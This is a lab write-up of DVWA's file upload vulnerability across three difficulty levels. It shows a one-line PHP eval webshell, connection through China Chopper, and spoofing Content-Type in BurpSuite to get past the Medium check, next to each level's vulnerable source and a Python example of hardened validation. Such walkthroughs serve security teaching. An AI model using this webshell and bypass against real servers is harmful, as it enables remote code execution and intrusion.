Supplemented, corrected and updated from time to time; discussion and corrections are welcome.
Contents
- Overview
- LOW
  - Source
- MEDIUM
  - Source
- HIGH
  - Source
Overview
A file upload vulnerability arises when the developer does not strictly validate and filter uploaded files, so that a user can exceed their own privileges and upload an executable dynamic script file to the server. The uploaded file may be a trojan, a virus, a malicious script or a WebShell. This is the most direct and effective attack method. "File upload" itself is not the problem; the problem is how the server handles and interprets the file after it has been uploaded. If the server's handling logic is not secure enough, the consequences are severe.
Original link: https://blog.csdn.net/qq_42636435/article/details/88096844
Environment:
win7: 192.168.126.135
kali: 192.168.126.129
owasp: 192.168.126.134
Tools: chopper (China Chopper), BurpSuite
Trojan (one-line webshell): <?php @eval($_POST['hacker']); ?>
LOW
Go to Upload and upload the file containing the prepared trojan.
Copy the directory path of the uploaded file shown in the prompt, paste it into the address bar (remember to delete the trailing # sign), press Enter to obtain the file's real path, and copy it.
Go to win7, open chopper, right-click Add, and enter the copied file path together with the password set in the trojan.
Login successful!
Source
```php
<?php
if (isset($_POST['Upload'])) {
    // The client-supplied name is used directly and nothing about the file is checked,
    // so any file type lands under the web root.
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename( $_FILES['uploaded']['name']);
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    } else {
        echo '<pre>';
        echo $target_path . ' succesfully uploaded!';
        echo '</pre>';
    }
}
?>
```
MEDIUM
Looking at the source, the type and size of the uploaded file are now restricted: only the jpeg format is allowed. Note that simply changing the file extension is useless here.
`if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000))`
This involves MIME (Multipurpose Internet Mail Extensions, media types).
(Screenshot: MIME type)
You can see the upload did not succeed.
At this point a third-party tool can be used to change the trojan file's MIME type to image/jpeg.
Use BurpSuite's proxy and intercept features to intercept and modify the HTTP request the browser sends to the server.
Go to kali. For convenience, set the proxy directly in the browser on kali; setting it to 127.0.0.1 is enough.
Start BurpSuite as the proxy. At first it sometimes pops up something about a JRE feature update; ignore it.
After entering, ignore the update and use the default configuration: Next -> Start Burp.
Go to the Proxy function. With intercept enabled, you will notice that the top-left keeps refreshing while uploading on DVWA.
Change the value of Content-Type: to image/jpeg, then turn intercept off.
The upload succeeds, and the remaining steps are exactly the same as before.
Source
```php
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    // 'type' is the Content-Type header the client sent; the server never verifies it.
    $uploaded_type = $_FILES['uploaded']['type'];
    $uploaded_size = $_FILES['uploaded']['size'];
    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
?>
```
HIGH
Source
```php
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    // Only the extension of the client-supplied name is checked; the file content is not.
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    }
}
?>
```
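The Medium level trusts the client-sent Content-Type and the High level trusts only the file extension. The following is an added example, not DVWA's code, written in Python rather than PHP as a stand-alone model of the server-side checks a hardened handler would make instead: ignore the declared type, allow-list the extension, verify the JPEG signature in the content, and store under a random name with a forced extension. The sample inputs are constructed.

```python
import os
import secrets

MAX_SIZE = 100_000             # same size cap DVWA uses
ALLOWED_EXT = {"jpg", "jpeg"}  # compared case-insensitively
JPEG_MAGIC = b"\xff\xd8\xff"   # JPEG SOI marker followed by a marker prefix


def extension_of(name: str) -> str:
    # basename() first: a client-controlled name must never carry a path
    base = os.path.basename(name)
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1].lower()


def validate_upload(name: str, declared_type: str, data: bytes) -> tuple:
    """Return (accepted, reason). declared_type is the client's Content-Type
    header, the field DVWA Medium trusts; it is deliberately not consulted."""
    if len(data) >= MAX_SIZE:
        return False, "too large"
    ext = extension_of(name)
    if ext not in ALLOWED_EXT:
        return False, "extension '%s' not allowed" % ext
    if not data.startswith(JPEG_MAGIC):
        # a renamed script passes the extension check (DVWA High) but fails here
        return False, "content is not a JPEG"
    return True, "ok"


def stored_name() -> str:
    # the client name is discarded entirely; the extension is forced to .jpg
    return secrets.token_hex(16) + ".jpg"


# Constructed sample inputs (not real captures)
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_TAG = b"<?php echo 1; ?>"

if __name__ == "__main__":
    cases = [("shell.php", "application/x-php", PHP_TAG),
             ("shell.php", "image/jpeg", PHP_TAG),   # spoofed Content-Type (Medium bypass)
             ("shell.jpg", "image/jpeg", PHP_TAG),   # renamed extension (High weakness)
             ("photo.JPEG", "image/jpeg", FAKE_JPEG)]
    for name, ctype, data in cases:
        print(name, ctype, validate_upload(name, ctype, data))
```

Even with content checks, the upload directory should additionally be configured so the web server never executes files from it.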
- Placeholder (to be written)